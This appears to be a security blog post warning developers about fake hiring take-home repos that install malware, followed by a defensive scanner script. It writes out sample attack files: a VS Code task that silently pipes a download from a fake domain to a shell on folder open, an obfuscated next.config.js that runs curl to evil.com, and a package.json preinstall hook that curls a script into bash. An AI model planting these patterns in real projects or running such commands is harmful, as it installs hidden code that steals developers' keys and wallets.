Hiring Scams: How Fake Job Tests Deploy Malware

2026-01-24 · Security · 5 min read

#security #malware #scams #vscode #careers

You get a take-home coding challenge from a recruiter. You clone the repo, open it in VS Code, and—without clicking anything—malware runs. Your SSH keys, browser sessions, and crypto wallets are now at risk. Here's how to spot it.

[Image: Malicious VS Code tasks configuration]
🚨 CRITICAL WARNING
  • Never run code from unknown sources - even "legitimate-looking" job tests
  • Check .vscode/, next.config.js, and package.json before opening projects
  • Pipe-to-shell execution is a major red flag: curl URL | sh
  • If something auto-runs on folder open, disconnect immediately

Pattern #1: Malicious .vscode/tasks.json

VS Code allows tasks to run automatically when you open a folder. Attackers hide malware execution here because most developers don't check hidden folders.

🚩 RED FLAG: Auto-execution on folder open

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "linux": {
        "command": "wget -qO- 'https://fake-tailwind.vercel.app/payload' | sh"
      },
      "osx": {
        "command": "curl 'https://fake-tailwind.vercel.app/payload' | sh"
      },
      "windows": {
        "command": "curl \"https://fake-tailwind.vercel.app/payload\" | cmd"
      },
      "presentation": {
        "reveal": "never", // ← Hide terminal output
        "echo": false,     // ← Silent execution
        "close": true      // ← Close immediately
      },
      "runOptions": {
        "runOn": "folderOpen" // ← Runs automatically!
      }
    }
  ]
}
```

Why this is malicious:

  • Auto-executes on folder open - you don't click anything
  • Pipe-to-shell pattern - downloads and runs remote code instantly
  • Hidden execution - terminal never shows, closes immediately
  • Fake domain - impersonates trusted tools like Tailwind
  • No verification - no checksums, no signatures, no transparency

Pattern #2: Obfuscated next.config.js

Next.js config files run during build and dev server startup. Scammers hide malicious code here using obfuscation or encoded strings.

🚩 RED FLAG: Obfuscated config code

```javascript
// next.config.js
const _0x4a2b=['exec','child_process','https://evil.com/payload.sh'];
(function(_0x123,_0x456){const _0x789=function(_0xabc){
while(--_0xabc){_0x123['push'](_0x123['shift']());}};
_0x789(++_0x456);
}(_0x4a2b,0x123));
const config = {
  webpack: (config) => {
    require(_0x4a2b[1])[_0x4a2b[0]](`curl ${_0x4a2b[2]} | sh`);
    return config;
  }
};
module.exports = config;
```

Why this is malicious:

  • Unreadable code - legitimate configs are clean and documented
  • Hex-encoded strings - hiding real URLs and commands
  • child_process.exec() - running shell commands during build
  • Executes on npm run dev or npm run build

✅ What legitimate next.config.js looks like

```javascript
// next.config.js
/** @type {import('next').NextConfig} */
const nextConfig = {
  reactStrictMode: true,
  images: {
    domains: ['example.com'],
  },
  env: {
    API_URL: process.env.API_URL,
  },
};
module.exports = nextConfig;
```

Pattern #3: Suspicious package.json dependencies

Malicious packages can execute code during npm install via install scripts or hidden dependencies.

🚩 RED FLAG: Dangerous install scripts

```json
{
  "name": "hiring-test",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node scripts/setup.js",
    "preinstall": "curl https://malicious-cdn.com/init.sh | bash"
  },
  "dependencies": {
    "react": "^18.2.0",
    "next": "^14.0.0",
    "@evil-org/helper-utils": "^1.0.0" // ← typosquatting
  }
}
```

Red flags in package.json:

  • postinstall/preinstall scripts - run automatically during npm install
  • Typosquatted packages - "react-domm" instead of "react-dom"
  • Unknown scoped packages - @random-org/utils from non-verified publishers
  • Very low download counts - check npm stats before installing
  • Recently published packages - with no commit history or community

What to do BEFORE opening any repo

Pre-flight checklist (30 seconds)
  1. Check .vscode/tasks.json first - look for "runOn": "folderOpen"
  2. Scan with agents - if you have already cloned the repo and there is no .vscode folder, scan it with a tool such as Cursor or Copilot in agent mode to verify it is safe.
  3. Read next.config.js - should be clean, no obfuscation
  4. Inspect package.json scripts - no preinstall/postinstall with curl/wget
  5. Verify all dependencies - search each on npmjs.com, check weekly downloads
  6. Never run npm install blindly - review first, install with --ignore-scripts if needed
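A small pre-flight scanner that automates checks 1, 3 and 4 of this checklist and covers all three red-flag patterns above. It is an added example, not code from the original post; it works on file contents passed as strings so it runs offline, the regexes are assumptions about what the patterns look like, and SAMPLE is constructed input, not a real repo.

```python
import json
import re

# Red-flag patterns from the checklist, as regexes (constructed for this example).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sh|bash|cmd|zsh|powershell)\b")
OBFUSCATION = re.compile(r"_0x[0-9a-fA-F]{2,}|child_process|\\x[0-9a-fA-F]{2}")
# Heuristic: strip // comments (tasks.json is JSONC) but keep the // inside URLs.
LINE_COMMENT = re.compile(r"(?<![:\w\"'])//[^\n]*")
TRAILING_COMMA = re.compile(r",(\s*[}\]])")

def load_jsonc(text):
    """Parse JSON that may carry // comments and trailing commas."""
    return json.loads(TRAILING_COMMA.sub(r"\1", LINE_COMMENT.sub("", text)))

def strings_in(obj):
    """Yield every string nested anywhere in a parsed JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, (dict, list)):
        for v in (obj.values() if isinstance(obj, dict) else obj):
            yield from strings_in(v)

def scan_files(files):
    """files maps repo-relative path -> contents; returns (path, reason) findings."""
    findings = []
    if ".vscode/tasks.json" in files:
        for task in load_jsonc(files[".vscode/tasks.json"]).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append((".vscode/tasks.json", "task runs on folderOpen"))
            if any(PIPE_TO_SHELL.search(s) for s in strings_in(task)):
                findings.append((".vscode/tasks.json", "pipe-to-shell command"))
    if "package.json" in files:
        scripts = load_jsonc(files["package.json"]).get("scripts", {})
        for hook in ("preinstall", "install", "postinstall"):
            if hook in scripts:  # any install hook deserves a look; pipe-to-shell is worse
                tag = " (pipe-to-shell)" if PIPE_TO_SHELL.search(scripts[hook]) else ""
                findings.append(("package.json", hook + " script" + tag))
    if "next.config.js" in files and OBFUSCATION.search(files["next.config.js"]):
        findings.append(("next.config.js", "obfuscation or child_process usage"))
    return findings

# Constructed sample repo contents mirroring the red flags above (not a real repo).
SAMPLE = {
    ".vscode/tasks.json": '{"tasks": [{"label": "setup", "type": "shell",\n'
    '  "linux": {"command": "wget -qO- \'https://example.invalid/p\' | sh"},\n'
    '  "runOptions": {"runOn": "folderOpen"} // auto-run\n}]}',
    "package.json": '{"scripts": {"preinstall": "curl https://example.invalid/i.sh | bash"}}',
    "next.config.js": "const _0x4a2b=['exec','child_process'];",
}
```

To use it on a clone, read `.vscode/tasks.json`, `package.json` and `next.config.js` into a dict keyed by those paths and pass it to `scan_files`; an empty list means none of these specific red flags were found, not that the repo is safe.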

If you already opened a suspicious repo

Immediate actions:

  1. Disconnect from the internet immediately
  2. Kill VS Code and all terminals
  3. Check running processes for unknown executables
  4. Rotate credentials immediately:
    • SSH keys (~/.ssh/)
    • GitHub personal access tokens
    • Browser sessions (logout everywhere)
    • API keys in .env files
  5. Move crypto wallets to new addresses if any were on that machine
  6. Consider full OS reinstall if you had sensitive data

Real-world impact

Developers have lost:

  • Crypto wallets - MetaMask, hardware wallet seeds from browser extensions
  • GitHub accounts - compromised via stolen tokens, used for supply chain attacks
  • Cloud credentials - AWS keys in .env files, leading to massive bills
  • Client data - SSH keys used to access production servers

Even experienced senior engineers have fallen for these because they look legitimate and target high-trust contexts (job applications).

Summary: Trust your instincts

If something feels off, it probably is:

  • ✅ Legitimate companies don't hide code in .vscode/
  • ✅ Real hiring tests don't auto-execute on folder open
  • ✅ Professional repos have clean, documented configs
  • ✅ Your security instincts are valuable—listen to them
© 2026 Ovodo Blog